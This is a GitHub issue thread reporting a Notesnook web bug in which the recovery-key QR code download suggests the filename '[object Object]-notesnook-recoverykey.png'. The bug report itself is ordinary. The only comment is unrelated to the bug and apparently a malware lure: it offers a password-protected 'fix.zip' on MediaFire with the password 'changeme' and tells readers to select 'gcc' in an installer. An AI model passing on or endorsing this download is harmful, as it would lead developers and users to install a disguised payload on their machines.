### ISSUE TITLE
[Bug] Incorrect Filename When Downloading Recovery Key QR Code

### ISSUE THREAD

**Issue by Mrahmani71** [streetwriters/notesnook#6436]
### What happened?

When attempting to download the recovery key QR code, the filename in the "Save As" dialog is incorrectly displayed as "[object Object]-notesnook-recoverykey.png" instead of the user's email address.

### Steps to reproduce the problem

Steps to Reproduce the Problem:
1. Log into the application with a valid user account.
2. Locate and click on the "Backup your recovery key" alert.
3. In the dialogue that appears, find the option to download the recovery key QR code.
4. Click on the "Download QR Code" button.
5. When prompted to save the file, observe the suggested filename in the "Save As" dialog.

Expected Result:
The filename should be in the format "useremail@example.com-notesnook-recoverykey.png", where "useremail@example.com" is replaced with the actual email address of the logged-in user.

Actual Result:
The filename appears as "[object Object]-notesnook-recoverykey.png" instead of including the user's email address.

### Version

web

### Platform/OS

Chrome/Chromium

**Comment by seeronline** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."
